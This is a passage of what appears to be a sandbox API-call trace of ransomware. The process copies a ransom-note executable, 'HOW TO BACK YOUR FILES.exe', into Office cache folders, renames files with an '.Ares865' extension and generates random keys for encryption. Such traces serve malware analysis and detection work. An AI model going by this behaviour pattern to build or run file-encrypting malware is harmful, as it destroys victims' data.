ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6001efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.015] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.015] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.015] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.Ares865") returned 84 [0078.015] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.ares865"), dwFlags=0x1) returned 1 [0078.016] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.016] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=913) returned 1 [0078.017] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0628) returned 1 [0078.017] CryptGenRandom (in: hProv=0x2f0628, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.017] CryptReleaseContext (hProv=0x2f0628, dwFlags=0x0) returned 1 [0078.019] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0628) returned 1 [0078.020] CryptGenRandom (in: hProv=0x2f0628, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.020] CryptReleaseContext (hProv=0x2f0628, dwFlags=0x0) returned 1 [0078.020] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.020] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.021] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.021] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1452) returned 1 [0078.021] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0628) returned 1 [0078.022] CryptGenRandom (in: hProv=0x2f0628, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.022] CryptReleaseContext (hProv=0x2f0628, dwFlags=0x0) returned 1 [0078.024] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0628) returned 1 [0078.025] CryptGenRandom (in: hProv=0x2f0628, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.025] CryptReleaseContext (hProv=0x2f0628, dwFlags=0x0) returned 1 [0078.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0078.025] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C" [0078.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f05a0 | out: hHeap=0x2b0000) returned 1 [0078.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0078.026] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 62 [0078.026] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C" [0078.026] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.026] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.038] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.038] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x60045100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x60045100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.038] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.038] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.038] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.Ares865") returned 85 [0078.038] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.ares865"), dwFlags=0x1) returned 1 [0078.039] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.040] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1452) returned 1 [0078.040] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0738) returned 1 [0078.040] CryptGenRandom (in: hProv=0x2f0738, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.040] CryptReleaseContext (hProv=0x2f0738, dwFlags=0x0) returned 1 [0078.043] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0738) returned 1 [0078.043] CryptGenRandom (in: hProv=0x2f0738, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.043] CryptReleaseContext (hProv=0x2f0738, dwFlags=0x0) returned 1 [0078.044] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.044] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.045] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.045] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1872) returned 1 [0078.045] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0738) returned 1 [0078.046] CryptGenRandom (in: hProv=0x2f0738, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.046] CryptReleaseContext (hProv=0x2f0738, dwFlags=0x0) returned 1 [0078.048] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0738) returned 1 [0078.048] CryptGenRandom (in: hProv=0x2f0738, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.048] CryptReleaseContext (hProv=0x2f0738, dwFlags=0x0) returned 1 [0078.049] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C" [0078.049] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0490 | out: hHeap=0x2b0000) returned 1 [0078.049] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0078.049] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 62 [0078.049] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C" [0078.049] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.049] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.054] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.054] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6006b260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6006b260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.054] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.054] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.054] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.Ares865") returned 85 [0078.054] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.ares865"), dwFlags=0x1) returned 1 [0078.055] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.055] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1606) returned 1 [0078.055] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f05a0) returned 1 [0078.056] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.056] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0078.058] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f05a0) returned 1 [0078.058] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.058] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0078.059] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.059] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.060] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.060] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1988) returned 1 [0078.060] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f05a0) returned 1 [0078.061] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.061] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0078.063] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f05a0) returned 1 [0078.064] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.064] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0078.065] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C" [0078.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0408 | out: hHeap=0x2b0000) returned 1 [0078.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0078.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned 62 [0078.065] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C" [0078.065] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.065] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.070] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.070] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x600913c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x600913c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.070] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.070] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.070] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.070] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.071] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.071] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6241) returned 1 [0078.072] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0490) returned 1 [0078.074] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.074] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0078.077] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0490) returned 1 [0078.078] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.078] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0078.078] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.Ares865") returned 83 [0078.078] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.ares865"), dwFlags=0x1) returned 1 [0078.079] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.079] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9503) returned 1 [0078.079] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0490) returned 1 [0078.080] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.080] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0078.083] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0490) returned 1 [0078.084] CryptGenRandom (in: hProv=0x2f0490, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.084] CryptReleaseContext (hProv=0x2f0490, dwFlags=0x0) returned 1 [0078.084] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C" [0078.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f07c0 | out: hHeap=0x2b0000) returned 1 [0078.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0078.085] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned 62 [0078.085] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C" [0078.085] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.085] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.089] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.089] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x600b7520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x600b7520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.089] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.089] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.089] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.Ares865") returned 86 [0078.090] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All 